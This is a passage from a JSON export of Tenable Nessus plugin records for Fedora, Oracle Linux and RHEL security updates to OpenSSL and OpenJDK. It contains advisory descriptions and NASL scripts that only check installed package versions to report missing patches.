SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"icedtea-6-jre-cacao / icedtea-6-jre-jamvm / openjdk-6-jre / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-07T15:52:18", "description": "Update to 1.0.1c and synced all patches with Fedora openssl-1.0.1c-7.fc19\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2012-11-26T00:00:00", "type": "nessus", "title": "Fedora 18 : mingw-openssl-1.0.1c-1.fc18 (2012-18035)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3207", "CVE-2011-4108", "CVE-2011-4576", "CVE-2011-4577", "CVE-2011-4619", "CVE-2012-0884", "CVE-2012-1165", "CVE-2012-2110", "CVE-2012-2333"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:mingw-openssl", "cpe:/o:fedoraproject:fedora:18"], "id": "FEDORA_2012-18035.NASL", "href": "https://www.tenable.com/plugins/nessus/63031", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2012-18035.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(63031);\n script_version(\"1.18\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2011-3207\", \"CVE-2011-4108\", \"CVE-2011-4576\", \"CVE-2011-4577\", \"CVE-2011-4619\", \"CVE-2012-0884\", \"CVE-2012-1165\", \"CVE-2012-2110\", \"CVE-2012-2333\");\n script_bugtraq_id(49469, 51281, 52428, 52764, 53158, 53476);\n script_xref(name:\"FEDORA\", value:\"2012-18035\");\n\n script_name(english:\"Fedora 18 : mingw-openssl-1.0.1c-1.fc18 (2012-18035)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Update to 1.0.1c and synced all patches with Fedora\nopenssl-1.0.1c-7.fc19\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=736089\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=773330\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=802817\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=814203\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=820694\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=846213\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2012-November/092905.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?7f876088\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected mingw-openssl package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:mingw-openssl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:18\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/09/22\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/11/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/11/26\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^18([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 18.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC18\", reference:\"mingw-openssl-1.0.1c-1.fc18\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"mingw-openssl\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-05T15:21:12", "description": "From Red Hat Security Advisory 2012:0322 :\n\nUpdated java-1.6.0-openjdk packages that fix several security issues are now available for Red Hat Enterprise Linux 5.\n\nThe Red Hat Security Response Team has rated this update as having important security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.\n\nThese packages provide the OpenJDK 6 Java Runtime Environment and the OpenJDK 6 Software Development Kit.\n\nIt was discovered that Java2D did not properly check graphics rendering objects before passing them to the native renderer.\nMalicious input, or an untrusted Java application or applet could use this flaw to crash the Java Virtual Machine (JVM), or bypass Java sandbox restrictions. (CVE-2012-0497)\n\nIt was discovered that the exception thrown on deserialization failure did not always contain a proper identification of the cause of the failure. An untrusted Java application or applet could use this flaw to bypass Java sandbox restrictions. (CVE-2012-0505)\n\nThe AtomicReferenceArray class implementation did not properly check if the array was of the expected Object[] type. A malicious Java application or applet could use this flaw to bypass Java sandbox restrictions. (CVE-2011-3571)\n\nIt was discovered that the use of TimeZone.setDefault() was not restricted by the SecurityManager, allowing an untrusted Java application or applet to set a new default time zone, and hence bypass Java sandbox restrictions. (CVE-2012-0503)\n\nThe HttpServer class did not limit the number of headers read from HTTP requests. A remote attacker could use this flaw to make an application using HttpServer use an excessive amount of CPU time via a specially crafted request. This update introduces a header count limit controlled using the sun.net.httpserver.maxReqHeaders property. The default value is 200. (CVE-2011-5035)\n\nThe Java Sound component did not properly check buffer boundaries.\nMalicious input, or an untrusted Java application or applet could use this flaw to cause the Java Virtual Machine (JVM) to crash or disclose a portion of its memory. (CVE-2011-3563)\n\nA flaw was found in the AWT KeyboardFocusManager that could allow an untrusted Java application or applet to acquire keyboard focus and possibly steal sensitive information. (CVE-2012-0502)\n\nIt was discovered that the CORBA (Common Object Request Broker Architecture) implementation in Java did not properly protect repository identifiers on certain CORBA objects. This could have been used to modify immutable object data. (CVE-2012-0506)\n\nAn off-by-one flaw, causing a stack overflow, was found in the unpacker for ZIP files. A specially crafted ZIP archive could cause the Java Virtual Machine (JVM) to crash when opened. (CVE-2012-0501)\n\nThis erratum also upgrades the OpenJDK package to IcedTea6 1.10.6.\nRefer to the NEWS file, linked to in the References, for further information.\n\nAll users of java-1.6.0-openjdk are advised to upgrade to these updated packages, which resolve these issues. All running instances of OpenJDK Java must be restarted for the update to take effect.", "cvss3": {}, "published": "2013-07-12T00:00:00", "type": "nessus", "title": "Oracle Linux 5 : java-1.6.0-openjdk (ELSA-2012-0322)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3563", "CVE-2011-3571", "CVE-2011-5035", "CVE-2012-0497", "CVE-2012-0501", "CVE-2012-0502", "CVE-2012-0503", "CVE-2012-0505", "CVE-2012-0506", "CVE-2012-0507"], "modified": "2022-03-08T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:java-1.6.0-openjdk", "p-cpe:/a:oracle:linux:java-1.6.0-openjdk-demo", "p-cpe:/a:oracle:linux:java-1.6.0-openjdk-devel", "p-cpe:/a:oracle:linux:java-1.6.0-openjdk-javadoc", "p-cpe:/a:oracle:linux:java-1.6.0-openjdk-src", "cpe:/o:oracle:linux:5"], "id": "ORACLELINUX_ELSA-2012-0322.NASL", "href": "https://www.tenable.com/plugins/nessus/68487", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2012:0322 and \n# Oracle Linux Security Advisory ELSA-2012-0322 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(68487);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/03/08\");\n\n script_cve_id(\n \"CVE-2011-3563\",\n \"CVE-2011-3571\",\n \"CVE-2011-5035\",\n \"CVE-2012-0497\",\n \"CVE-2012-0501\",\n \"CVE-2012-0502\",\n \"CVE-2012-0503\",\n \"CVE-2012-0505\",\n \"CVE-2012-0506\",\n \"CVE-2012-0507\"\n );\n script_bugtraq_id(\n 51194,\n 51467,\n 52009,\n 52011,\n 52012,\n 52013,\n 52014,\n 52017,\n 52018,\n 52161\n );\n script_xref(name:\"RHSA\", value:\"2012:0322\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/03/24\");\n\n script_name(english:\"Oracle Linux 5 : java-1.6.0-openjdk (ELSA-2012-0322)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Oracle Linux host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"From Red Hat Security Advisory 2012:0322 :\n\nUpdated java-1.6.0-openjdk packages that fix several security issues\nare now available for Red Hat Enterprise Linux 5.\n\nThe Red Hat Security Response Team has rated this update as having\nimportant security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThese packages provide the OpenJDK 6 Java Runtime Environment and the\nOpenJDK 6 Software Development Kit.\n\nIt was discovered that Java2D did not properly check graphics\nrendering objects before passing them to the native renderer.\nMalicious input, or an untrusted Java application or applet could use\nthis flaw to crash the Java Virtual Machine (JVM), or bypass Java\nsandbox restrictions. (CVE-2012-0497)\n\nIt was discovered that the exception thrown on deserialization failure\ndid not always contain a proper identification of the cause of the\nfailure. An untrusted Java application or applet could use this flaw\nto bypass Java sandbox restrictions. (CVE-2012-0505)\n\nThe AtomicReferenceArray class implementation did not properly check\nif the array was of the expected Object[] type. A malicious Java\napplication or applet could use this flaw to bypass Java sandbox\nrestrictions. (CVE-2011-3571)\n\nIt was discovered that the use of TimeZone.setDefault() was not\nrestricted by the SecurityManager, allowing an untrusted Java\napplication or applet to set a new default time zone, and hence bypass\nJava sandbox restrictions. (CVE-2012-0503)\n\nThe HttpServer class did not limit the number of headers read from\nHTTP requests. A remote attacker could use this flaw to make an\napplication using HttpServer use an excessive amount of CPU time via a\nspecially crafted request. This update introduces a header count limit\ncontrolled using the sun.net.httpserver.maxReqHeaders property. The\ndefault value is 200. (CVE-2011-5035)\n\nThe Java Sound component did not properly check buffer boundaries.\nMalicious input, or an untrusted Java application or applet could use\nthis flaw to cause the Java Virtual Machine (JVM) to crash or disclose\na portion of its memory. (CVE-2011-3563)\n\nA flaw was found in the AWT KeyboardFocusManager that could allow an\nuntrusted Java application or applet to acquire keyboard focus and\npossibly steal sensitive information. (CVE-2012-0502)\n\nIt was discovered that the CORBA (Common Object Request Broker\nArchitecture) implementation in Java did not properly protect\nrepository identifiers on certain CORBA objects. This could have been\nused to modify immutable object data. (CVE-2012-0506)\n\nAn off-by-one flaw, causing a stack overflow, was found in the\nunpacker for ZIP files. A specially crafted ZIP archive could cause\nthe Java Virtual Machine (JVM) to crash when opened. (CVE-2012-0501)\n\nThis erratum also upgrades the OpenJDK package to IcedTea6 1.10.6.\nRefer to the NEWS file, linked to in the References, for further\ninformation.\n\nAll users of java-1.6.0-openjdk are advised to upgrade to these\nupdated packages, which resolve these issues. All running instances of\nOpenJDK Java must be restarted for the update to take effect.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://oss.oracle.com/pipermail/el-errata/2012-March/002690.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected java-1.6.0-openjdk packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2012-0507\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Java AtomicReferenceArray Type Violation Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/12/29\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/03/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:java-1.6.0-openjdk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:java-1.6.0-openjdk-demo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:java-1.6.0-openjdk-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:java-1.6.0-openjdk-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:java-1.6.0-openjdk-src\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:5\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 5\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL5\", reference:\"java-1.6.0-openjdk-1.6.0.0-1.25.1.10.6.0.1.el5_8\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"java-1.6.0-openjdk-demo-1.6.0.0-1.25.1.10.6.0.1.el5_8\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"java-1.6.0-openjdk-devel-1.6.0.0-1.25.1.10.6.0.1.el5_8\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"java-1.6.0-openjdk-javadoc-1.6.0.0-1.25.1.10.6.0.1.el5_8\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"java-1.6.0-openjdk-src-1.6.0.0-1.25.1.10.6.0.1.el5_8\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"java-1.6.0-openjdk / java-1.6.0-openjdk-demo / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-07T15:37:06", "description": "Updated java-1.6.0-openjdk packages that fix several security issues are now available for Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this update as having critical security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.\n\nThese packages provide the OpenJDK 6 Java Runtime Environment and the OpenJDK 6 Software Development Kit.\n\nIt was discovered that Java2D did not properly check graphics rendering objects before passing them to the native renderer.\nMalicious input, or an untrusted Java application or applet could use this flaw to crash the Java Virtual Machine (JVM), or bypass Java sandbox restrictions. (CVE-2012-0497)\n\nIt was discovered that the exception thrown on deserialization failure did not always contain a proper identification of the cause of the failure. An untrusted Java application or applet could use this flaw to bypass Java sandbox restrictions. (CVE-2012-0505)\n\nThe AtomicReferenceArray class implementation did not properly check if the array was of the expected Object[] type. A malicious Java application or applet could use this flaw to bypass Java sandbox restrictions. (CVE-2011-3571)\n\nIt was discovered that the use of TimeZone.setDefault() was not restricted by the SecurityManager, allowing an untrusted Java application or applet to set a new default time zone, and hence bypass Java sandbox restrictions. (CVE-2012-0503)\n\nThe HttpServer class did not limit the number of headers read from HTTP requests. A remote attacker could use this flaw to make an application using HttpServer use an excessive amount of CPU time via a specially crafted request. This update introduces a header count limit controlled using the sun.net.httpserver.maxReqHeaders property. The default value is 200. (CVE-2011-5035)\n\nThe Java Sound component did not properly check buffer boundaries.\nMalicious input, or an untrusted Java application or applet could use this flaw to cause the Java Virtual Machine (JVM) to crash or disclose a portion of its memory. (CVE-2011-3563)\n\nA flaw was found in the AWT KeyboardFocusManager that could allow an untrusted Java application or applet to acquire keyboard focus and possibly steal sensitive information. (CVE-2012-0502)\n\nIt was discovered that the CORBA (Common Object Request Broker Architecture) implementation in Java did not properly protect repository identifiers on certain CORBA objects. This could have been used to modify immutable object data. (CVE-2012-0506)\n\nAn off-by-one flaw, causing a stack overflow, was found in the unpacker for ZIP files. A specially crafted ZIP archive could cause the Java Virtual Machine (JVM) to crash when opened. (CVE-2012-0501)\n\nNote: If the web browser plug-in provided by the icedtea-web package was installed, the issues exposed via Java applets could have been exploited without user interaction if a user visited a malicious website.\n\nThis erratum also upgrades the OpenJDK package to IcedTea6 1.10.6.\nRefer to the NEWS file, linked to in the References, for further information.\n\nAll users of java-1.6.0-openjdk are advised to upgrade to these updated packages, which resolve these issues. All running instances of OpenJDK Java must be restarted for the update to take effect.", "cvss3": {}, "published": "2012-02-15T00:00:00", "type": "nessus", "title": "RHEL 6 : java-1.6.0-openjdk (RHSA-2012:0135)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3563", "CVE-2011-3571", "CVE-2011-5035", "CVE-2012-0497", "CVE-2012-0501", "CVE-2012-0502", "CVE-2012-0503", "CVE-2012-0505", "CVE-2012-0506", "CVE-2012-0507"], "modified": "2022-03-08T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:java-1.6.0-openjdk", "p-cpe:/a:redhat:enterprise_linux:java-1.6.0-openjdk-debuginfo", "p-cpe:/a:redhat:enterprise_linux:java-1.6.0-openjdk-demo", "p-cpe:/a:redhat:enterprise_linux:java-1.6.0-openjdk-devel", "p-cpe:/a:redhat:enterprise_linux:java-1.6.0-openjdk-javadoc", "p-cpe:/a:redhat:enterprise_linux:java-1.6.0-openjdk-src", "cpe:/o:redhat:enterprise_linux:6", "cpe:/o:redhat:enterprise_linux:6.2"], "id": "REDHAT-RHSA-2012-0135.NASL", "href": "https://www.tenable.com/plugins/nessus/57956", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2012:0135. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(57956);\n script_version(\"1.37\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/03/08\");\n\n script_cve_id(\n \"CVE-2011-3563\",\n \"CVE-2011-3571\",\n \"CVE-2011-5035\",\n \"CVE-2012-0497\",\n \"CVE-2012-0501\",\n \"CVE-2012-0502\",\n \"CVE-2012-0503\",\n \"CVE-2012-0505\",\n \"CVE-2012-0506\",\n \"CVE-2012-0507\"\n );\n script_bugtraq_id(\n 51194,\n 51467,\n 52009,\n 52011,\n 52012,\n 52013,\n 52014,\n 52017,\n 52018\n );\n script_xref(name:\"RHSA\", value:\"2012:0135\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/03/24\");\n\n script_name(english:\"RHEL 6 : java-1.6.0-openjdk (RHSA-2012:0135)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Red Hat host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"Updated java-1.6.0-openjdk packages that fix several security issues\nare now available for Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this update as having\ncritical security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThese packages provide the OpenJDK 6 Java Runtime Environment and the\nOpenJDK 6 Software Development Kit.\n\nIt was discovered that Java2D did not properly check graphics\nrendering objects before passing them to the native renderer.\nMalicious input, or an untrusted Java application or applet could use\nthis flaw to crash the Java Virtual Machine (JVM), or bypass Java\nsandbox restrictions. (CVE-2012-0497)\n\nIt was discovered that the exception thrown on deserialization failure\ndid not always contain a proper identification of the cause of the\nfailure. An untrusted Java application or applet could use this flaw\nto bypass Java sandbox restrictions. (CVE-2012-0505)\n\nThe AtomicReferenceArray class implementation did not properly check\nif the array was of the expected Object[] type. A malicious Java\napplication or applet could use this flaw to bypass Java sandbox\nrestrictions. (CVE-2011-3571)\n\nIt was discovered that the use of TimeZone.setDefault() was not\nrestricted by the SecurityManager, allowing an untrusted Java\napplication or applet to set a new default time zone, and hence bypass\nJava sandbox restrictions. (CVE-2012-0503)\n\nThe HttpServer class did not limit the number of headers read from\nHTTP requests. A remote attacker could use this flaw to make an\napplication using HttpServer use an excessive amount of CPU time via a\nspecially crafted request. This update introduces a header count limit\ncontrolled using the sun.net.httpserver.maxReqHeaders property. The\ndefault value is 200. (CVE-2011-5035)\n\nThe Java Sound component did not properly check buffer boundaries.\nMalicious input, or an untrusted Java application or applet could use\nthis flaw to cause the Java Virtual Machine (JVM) to crash or disclose\na portion of its memory. (CVE-2011-3563)\n\nA flaw was found in the AWT KeyboardFocusManager that could allow an\nuntrusted Java application or applet to acquire keyboard focus and\npossibly steal sensitive information. (CVE-2012-0502)\n\nIt was discovered that the CORBA (Common Object Request Broker\nArchitecture) implementation in Java did not properly protect\nrepository identifiers on certain CORBA objects. This could have been\nused to modify immutable object data. (CVE-2012-0506)\n\nAn off-by-one flaw, causing a stack overflow, was found in the\nunpacker for ZIP files. A specially crafted ZIP archive could cause\nthe Java Virtual Machine (JVM) to crash when opened. (CVE-2012-0501)\n\nNote: If the web browser plug-in provided by the icedtea-web package\nwas installed, the issues exposed via Java applets could have been\nexploited without user interaction if a user visited a malicious\nwebsite.\n\nThis erratum also upgrades the OpenJDK package to IcedTea6 1.10.6.\nRefer to the NEWS file, linked to in the References, for further\ninformation.\n\nAll users of java-1.6.0-openjdk are advised to upgrade to these\nupdated packages, which resolve these issues. All running instances of\nOpenJDK Java must be restarted for the update to take effect.\");\n # http://icedtea.classpath.org/hg/release/icedtea6-1.10/file/icedtea6-1.10.6/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?ae234811\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.oracle.com/technetwork/topics/security/whatsnew/index.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2012:0135\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2011-5035\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2012-0505\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2011-3563\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2011-3571\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2012-0506\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2012-0497\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2012-0503\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2012-0502\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2012-0501\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2012-0507\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2012-0507\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Java AtomicReferenceArray Type Violation Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/12/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/02/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/02/15\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.6.0-openjdk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.6.0-openjdk-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.6.0-openjdk-demo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.6.0-openjdk-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.6.0-openjdk-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.6.0-openjdk-src\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.2\");\n script_set_attribute(attribute:\"generated_plugin\", 